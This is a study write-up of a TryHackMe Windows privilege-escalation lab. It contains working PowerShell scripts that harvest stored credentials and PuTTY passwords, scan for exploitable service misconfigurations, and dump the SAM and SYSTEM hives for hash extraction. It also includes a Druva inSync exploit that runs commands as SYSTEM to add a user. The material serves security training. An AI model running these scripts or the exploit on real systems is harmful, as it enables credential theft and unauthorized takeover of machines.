
TryHackMe - Windows Privilege Escalation


Enumeration and Information Gathering

  • Windows 10 Pro: includes BitLocker drive encryption (not available on Home), so check which edition you landed on.
  • Local users and groups: lusrmgr.msc (the Local Users and Groups snap-in).
  • The SYSTEM (LocalSystem) account has more privileges than any Administrator user; it is the usual end goal.
    PowerShell History (%userprofile% expands in cmd.exe; from PowerShell use $env:USERPROFILE instead):

    type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

    Saved Windows Credentials (cmdkey only lists the stored targets, it never prints the password; runas /savecred uses the stored entry):

    cmdkey /list
    runas /savecred /user:admin cmd.exe

    IIS Configuration (connection strings in web.config frequently carry database passwords):

    type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

    Retrieve Credentials from installed software
    Example: PuTTY stores proxy credentials for saved sessions in the registry:

    reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

    Scheduled Tasks (look at "Task To Run" and "Run As User"):

    schtasks /query /tn vulntask /fo list /v

    File permissions of the file the task runs (write access for your user or group means you control what runs as the task's account):

    icacls c:\tasks\schtask.bat

    Windows Services (shows BINARY_PATH_NAME and SERVICE_START_NAME, i.e. what runs and as whom):

    sc qc apphostsvc

    apphostsvc is only an example service name; substitute the service you are inspecting.
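The checks above, one per command, are easier to run as a single script once you have a shell. The following is an added example written for these notes, not code from the TryHackMe room: it reads PSReadline history for every readable profile, lists cmdkey targets, greps the web.config locations for connection strings, pulls PuTTY proxy credentials from HKCU, and lists scheduled task actions with their icacls output. It assumes PowerShell 5.1+, an English locale (the schtasks CSV column names are localized elsewhere), and the standard Windows paths; the 32-bit Framework web.config path is an assumption added for 32-bit application pools.

```powershell
# Added credential- and task-hunting script for the enumeration steps above; not part of the room.
# Assumptions: PowerShell 5.1+, English locale, standard Windows paths.

function Get-PSReadlineHistory {
    # PSReadline history for every profile whose history file we are allowed to read
    $rel = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
    foreach ($userDir in Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue) {
        $file = Join-Path $userDir.FullName $rel
        if (-not (Test-Path $file)) { continue }
        try {
            [pscustomobject]@{ User = $userDir.Name; File = $file; Lines = @(Get-Content $file -ErrorAction Stop) }
        } catch { }   # other users' profiles are access denied until we are privileged
    }
}

function Get-SavedCredentialTargets {
    # cmdkey never prints the secret, only the targets runas /savecred can use
    foreach ($line in (cmdkey /list)) {
        if ($line -match '^\s*Target:\s*(.+?)\s*$') { $matches[1] }
    }
}

# The two locations from the room plus the 32-bit Framework copy (assumption).
$IisConfigPaths = @(
    'C:\inetpub\wwwroot\web.config',
    'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config',
    'C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\web.config'
)
function Find-ConnectionStrings {
    foreach ($path in $IisConfigPaths) {
        if (-not (Test-Path $path)) { continue }
        Select-String -Path $path -Pattern 'connectionString' -SimpleMatch |
            ForEach-Object { [pscustomobject]@{ File = $path; Line = $_.LineNumber; Text = $_.Line.Trim() } }
    }
}

function Get-PuttyProxyCredentials {
    # PuTTY keeps per-session settings under HKCU; ProxyUsername/ProxyPassword are stored in clear text
    $base = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
    if (-not (Test-Path $base)) { return }
    foreach ($key in Get-ChildItem $base) {
        $s = Get-ItemProperty $key.PSPath
        if ($s.ProxyUsername -or $s.ProxyPassword) {
            [pscustomobject]@{ Session = $key.PSChildName; Host = $s.HostName; ProxyHost = $s.ProxyHost
                               ProxyUser = $s.ProxyUsername; ProxyPassword = $s.ProxyPassword }
        }
    }
}

function Get-TaskActions {
    # One CSV row per task: "Task To Run" is the action, "Run As User" the account it runs as.
    # schtasks repeats the header row once per task folder, so those rows are dropped.
    schtasks /query /fo csv /v | ConvertFrom-Csv |
        Where-Object { $_.TaskName -ne 'TaskName' -and $_.'Task To Run' -notmatch '^(COM handler|N/A)' } |
        ForEach-Object {
            $action = $_.'Task To Run'
            $exe = if ($action -match '^"([^"]+)"') { $matches[1] } else { ($action -split '\s+')[0] }
            $exe = [Environment]::ExpandEnvironmentVariables($exe)
            # Same check as "icacls c:\tasks\schtask.bat": (F), (M) or (W) for your user/group means you control it
            $acl = if (Test-Path $exe) { (icacls $exe 2>$null | Select-Object -First 3) -join ' ' } else { 'file not found' }
            [pscustomobject]@{ Task = $_.TaskName; RunAs = $_.'Run As User'; Action = $action; Acl = $acl }
        }
}

Get-PSReadlineHistory      | ForEach-Object { "[$($_.User)] $($_.File)"; $_.Lines }
Get-SavedCredentialTargets | ForEach-Object { "saved credential target: $_" }
Find-ConnectionStrings     | Format-Table -AutoSize
Get-PuttyProxyCredentials  | Format-List
Get-TaskActions            | Format-List
```

Each function returns objects rather than text so the output can be filtered further (for example `Get-TaskActions | Where-Object RunAs -match 'SYSTEM|Administrator'` to look only at tasks worth hijacking).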

    Abusing Service Misconfiguration

    Every service has a Discretionary Access Control List (DACL) that says who may start, stop, pause, query the status, query the configuration or reconfigure the service, amongst other rights. The DACL can be inspected with Process Hacker (available on the TryHackMe machine's desktop).

  • Every service's configuration (ImagePath, ObjectName, Start type, etc.) is stored in the registry under HKLM\SYSTEM\CurrentControlSet\Services\<service name>; write access to that key is equivalent to reconfiguring the service.

    Unquoted Service Paths

    If BINARY_PATH_NAME is unquoted and contains spaces, the Service Control Manager tries each space-delimited prefix as an executable ("C:\Program.exe", "C:\Program Files\Disk.exe", ...) before reaching the real binary. A directory you can write to along that path lets you plant an executable that runs as the service account.

    sc qc "disk sorter enterprise"

    Insecure Service Permissions

    accesschk (Sysinternals) prints the service DACL. SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG for a group you belong to means you can point the service at your own binary with sc config and then restart it.

    accesschk64.exe -qlc thmservice
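Checking one service at a time with sc qc and accesschk does not scale to a box with a hundred services. The script below is an added example for these notes, not the room's own code: it walks every Win32_Service and reports unquoted paths whose intermediate directories are writable, service binaries that are writable, and service registry keys that are writable, all judged against the SIDs in the current token. It assumes PowerShell 5.1+. Two simplifications are assumptions, not facts from the room: Deny ACEs are ignored, and the service object's own DACL (what accesschk -qlc shows) is not read, so treat each hit as something to confirm with accesschk64.exe -qlc or icacls before acting on it.

```powershell
# Added service-misconfiguration scan; not part of the TryHackMe room.
# Assumptions: PowerShell 5.1+, Deny ACEs ignored, service-object DACL not checked.

$Identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$MySids   = @($Identity.User.Value) + @($Identity.Groups | ForEach-Object { $_.Value })  # user + every token group

function Test-Writable {
    param([string]$Path)   # file, directory or registry path such as HKLM:\SYSTEM\...
    try { $acl = Get-Acl -Path $Path -ErrorAction Stop } catch { return $false }   # no READ_CONTROL: assume not writable
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # orphaned SID or untranslatable name
        if ($MySids -notcontains $sid) { continue }
        # FileSystemRights on files/dirs, RegistryRights on keys; the absent property is $null.
        # Unnamed generic masks print as numbers: 268435456 = GENERIC_ALL, 1073741824 = GENERIC_WRITE.
        $rights = "$($ace.FileSystemRights)$($ace.RegistryRights)"
        if ($rights -match 'FullControl|Modify|\bWrite\b|WriteData|CreateFiles|AppendData|CreateDirectories|SetValue|CreateSubKey|WriteKey|ChangePermissions|TakeOwnership|268435456|1073741824') {
            return $true
        }
    }
    return $false
}

function Get-ServiceExePath {
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $matches[1] }   # quoted: the binary is unambiguous
    if ($PathName -match '^(.+?\.exe)') { return $matches[1] }  # unquoted: everything up to the first .exe
    return ($PathName -split '\s+')[0]
}

function Find-ServiceMisconfigs {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if (-not $path) { continue }
        $exe = [Environment]::ExpandEnvironmentVariables((Get-ServiceExePath $path))
        $findings = @()

        # 1. Unquoted path with spaces: the SCM tries C:\Program.exe, C:\Program Files\Disk.exe, ...
        #    before the real binary, so a writable directory along the way lets you plant one.
        if ($path -notmatch '^"' -and $exe -match ' ') {
            $parts = $exe -split ' '
            for ($i = 1; $i -lt $parts.Count; $i++) {
                $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
                $dir = Split-Path -Path $candidate -Parent
                if ($dir -and (Test-Writable $dir)) { $findings += "unquoted path: can plant $candidate" }
            }
        }
        # 2. The binary itself is replaceable (what icacls shows as (F), (M) or (W) for you).
        if ((Test-Path $exe) -and (Test-Writable $exe)) { $findings += "binary is writable: $exe" }

        # 3. ImagePath/ObjectName live under this key; write access there equals sc config.
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        if (Test-Writable $key) { $findings += "service registry key is writable: $key" }

        if ($findings.Count -gt 0) {
            [pscustomobject]@{
                Service  = $svc.Name
                RunsAs   = $svc.StartName
                Start    = $svc.StartMode
                Path     = $path
                Findings = ($findings -join '; ')
            }
        }
    }
}

Find-ServiceMisconfigs | Format-List
```

A finding is only useful if the service runs as a higher-privileged account than you (RunsAs) and you can get it restarted: Start = Auto plus a reboot, or SERVICE_START/SERVICE_STOP rights on the service, which is exactly what accesschk tells you.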
    
    Windows Privileges

    whoami /priv
    

Tool: https://github.com/gtworek/Priv2Admin

Official Doc: https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants

SeBackup and SeRestore

SeBackupPrivilege lets a process read any file regardless of its DACL (backup semantics); SeRestorePrivilege lets it write any file the same way. Built-in commands already use them, so no custom tooling is needed: reg save HKLM\SAM and reg save HKLM\SYSTEM dump the hives for offline hash extraction, and robocopy /b copies files you otherwise could not read.
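As an added example for this section (not code from the room), the script below parses whoami /priv into objects, annotates the privileges that Priv2Admin lists as escalation paths, and, when SeBackupPrivilege is present, saves the SAM and SYSTEM hives with reg.exe exactly as the room does. It assumes an English locale (whoami prints Enabled/Disabled localized elsewhere) and that $OutDir is writable by the current user; the abuse descriptions in $Interesting are my summaries, not text from the room.

```powershell
# Added example: parse whoami /priv, flag abusable privileges, dump hives via SeBackupPrivilege.
# Assumptions: English locale, $OutDir writable, reg.exe on PATH.

$Interesting = @{
    'SeBackupPrivilege'             = 'read any file regardless of ACL (reg save SAM/SYSTEM, robocopy /b)'
    'SeRestorePrivilege'            = 'write any file regardless of ACL (replace service binaries, DLLs)'
    'SeTakeOwnershipPrivilege'      = 'take ownership of any object, then grant yourself access'
    'SeImpersonatePrivilege'        = 'impersonate client tokens (Potato family, RogueWinRM)'
    'SeAssignPrimaryTokenPrivilege' = 'assign a primary token to a new process (Potato family)'
    'SeDebugPrivilege'              = 'open any process (dump LSASS, inject into SYSTEM processes)'
    'SeLoadDriverPrivilege'         = 'load a kernel driver'
}

function Get-TokenPrivileges {
    # whoami /priv rows look like: SeBackupPrivilege   Back up files and directories   Disabled
    foreach ($line in (whoami /priv)) {
        if ($line -match '^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$') {
            [pscustomobject]@{
                Name        = $matches[1]
                Description = $matches[2]
                State       = $matches[3]
                Abuse       = $Interesting[$matches[1]]   # $null for privileges with no known path
            }
        }
    }
}

function Save-RegistryHives {
    param([string]$OutDir = (Join-Path $env:TEMP 'hives'))
    # "Disabled" in whoami /priv is fine: reg.exe enables the privilege itself. What matters is
    # that SeBackupPrivilege is in the token at all, otherwise reg save HKLM\SAM is access denied.
    if (-not (Get-TokenPrivileges | Where-Object Name -eq 'SeBackupPrivilege')) {
        throw 'SeBackupPrivilege not held; reg save of SAM/SYSTEM would be denied'
    }
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
    foreach ($hive in 'SAM', 'SYSTEM') {
        $out = Join-Path $OutDir "$hive.hive"
        & reg.exe save "HKLM\$hive" $out /y | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "reg save HKLM\$hive failed (exit code $LASTEXITCODE)" }
        Get-Item $out
    }
}

Get-TokenPrivileges | Where-Object Abuse | Format-Table -AutoSize
# Save-RegistryHives   # then feed SAM.hive and SYSTEM.hive to an offline extractor such as impacket's secretsdump.py
```

The two saved hives contain the local account hashes; the SYSTEM hive holds the boot key needed to decrypt the SAM, which is why both are taken.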

Abusing Vulnerable Software

wmic product get name,version,vendor
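Two caveats a practitioner would want here: wmic is deprecated, and wmic product (the Win32_Product class) makes Windows Installer run a consistency check on every MSI package it enumerates, which is slow and leaves MsiInstaller events in the Application log. The same name, version and vendor fields live in the Uninstall registry keys. The function below is an added example for these notes, not code from the room; it assumes PowerShell 5.1+ and the three standard Uninstall key locations.

```powershell
# Added example: installed-software inventory from the Uninstall keys instead of wmic product.
# Assumption: standard key locations; per-user installs appear only for the current user.

function Get-InstalledSoftware {
    param([string]$Filter = '.*')   # regex matched against name and publisher
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',   # 32-bit apps on 64-bit Windows
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'                # per-user installs
    )
    Get-ItemProperty -Path $keys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -and ($_.DisplayName -match $Filter -or $_.Publisher -match $Filter) } |
        Select-Object @{ n = 'Name';            e = { $_.DisplayName } },
                      @{ n = 'Version';         e = { $_.DisplayVersion } },
                      @{ n = 'Vendor';          e = { $_.Publisher } },
                      @{ n = 'InstallLocation'; e = { $_.InstallLocation } },
                      @{ n = 'Source';          e = { $_.PSPath -replace '^.*::', '' } } |
        Sort-Object Name -Unique
}

Get-InstalledSoftware | Format-Table -AutoSize
Get-InstalledSoftware -Filter 'Druva'   # narrow down to the client targeted by the exploit below
```

Version strings are what you search for in exploit databases, and InstallLocation is where to look for the service binaries and configuration the next step abuses.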

Exploit Code (Druva inSync client, as used in the room: the client service listens on localhost:6064 as SYSTEM and runs the path it is sent; it only checks that the path starts with its own install directory, so ..\ segments walk out to cmd.exe):

$ErrorActionPreference = "Stop"

# Command executed as SYSTEM. Follow up with "net localgroup administrators pwnd /add".
$cmd = "net user pwnd /add"

# Plain TCP to the inSync RPC listener on the loopback interface
$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

# Framing the service expects: magic header, 4-byte RPC type (05 00 00 00), 4-byte length, UTF-16LE command
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
# Path traversal: starts under the expected install directory, ends at cmd.exe
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);   # little-endian byte count of $command

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

Tools:

  1. WinPEAS
  2. PrivescCheck
  3. WES-NG: Windows Exploit Suggester - Next Generation

Resources:

  1. Windows Local Priv-Esc
  2. Token Kidnapping
  3. Decoder
  4. Potatoes (Windows privilege escalation)
  5. RogueWinRM
  6. Priv2Admin
  7. PayloadsAllTheThings - Windows Privilege Escalation
This post is licensed under CC BY 4.0 by the author.